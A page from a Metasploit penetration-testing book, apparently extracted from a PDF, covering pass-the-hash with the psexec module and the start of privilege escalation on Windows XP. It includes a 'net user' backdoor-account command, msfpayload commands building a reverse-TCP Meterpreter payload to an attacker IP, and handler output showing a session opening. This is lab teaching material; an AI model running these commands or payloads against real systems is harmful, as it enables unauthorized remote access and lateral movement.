background image

Meterpreter

85

[*] Uploading payload...
[*] Created \JsOvAFLy.exe...

After we select the 

smb/psexec

 module at   and set the options for 

LHOST

LPORT

, and 

RHOST

, we set the 

SMBPass

 variable, and at   we input the hash that 

we dumped earlier. As you can see, authentication is successful and we gain 
our Meterpreter session. We didn’t have to crack a password, and no pass-
word was needed. We’ve secured 

Administrator

 privileges using the password 

hash alone.

When we successfully compromise one system on a large network, in 

most cases that system will have the same administrator account on multiple 
systems. This attack would allow us to hop from one system to another with-
out ever needing to crack the password itself.

Privilege Escalation

Now that we have access to the system, we can create a normal user account 
with limited permissions using the 

net user

 command. We’ll create a new 

user account to demonstrate how to elevate permissions as that user. (You 
will learn more about this in Chapter 8.)

When we compromise a limited user account, we will run into restric-

tions that prevent us from executing commands that require administrative-
level permissions. By elevating an account’s permissions, we overcome that 
restriction.

On a Windows XP target machine, we enter the following command:

C:\Documents and Settings\Administrator>

net user bob password123 /add.

Next, we create a Meterpreter-based payload, 

payload.exe

, copy it to the 

target’s XP machine, and run it under the user account 

bob

. This will be our 

new limited user account. In this example, we will use 

msfpayload

 to create a 

Meterpreter-based payload as a normal Windows executable. (We’ll discuss 

msfpayload

 in more detail in Chapter 7.)

root@bt:/opt/framework3/msf3# 

msfpayload windows/meterpreter/reverse_tcp 

LHOST=192.168.33.129 LPORT=443 X > payload.exe

 

root@bt:/opt/framework3/msf3# 

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp 

LHOST=192.168.33.129 LPORT=443 E

 

[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.33.129:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:443 -> 192.168.33.130:1056)
meterpreter > 

getuid 

Server username: IHAZSECURITY\bob